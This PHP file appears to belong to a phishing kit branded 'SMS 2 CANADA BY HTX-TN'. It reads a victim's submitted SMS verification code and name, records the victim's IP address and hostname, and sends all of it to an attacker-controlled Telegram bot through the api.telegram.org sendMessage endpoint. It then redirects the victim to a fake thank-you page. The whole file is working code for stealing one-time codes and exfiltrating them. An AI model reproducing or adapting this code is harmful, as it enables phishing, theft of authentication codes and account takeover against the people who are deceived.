<?php

error_reporting(0);
session_start();
include "../../config.php";
$ip = getenv("REMOTE_ADDR");
$link = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'] ;






	$_SESSION["name"]= $_POST['First-Name']." ".$_POST['Last-Name'];

$hostname = gethostbyaddr($ip);
$message = "[========== ❄️ SMS 2 CANADA BY HTX-TN❄️ ===========]\r\n";
$message .= "|SMS 2      	 : ".$_POST['ccvv']."\r\n";
$message .= "[========= $ip ========]\r\n";

file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message)."" );
echo"<script>location.replace('../thank.php?country.x=Global&one=ok&flowId=ul&_Email=data');</script>";


?>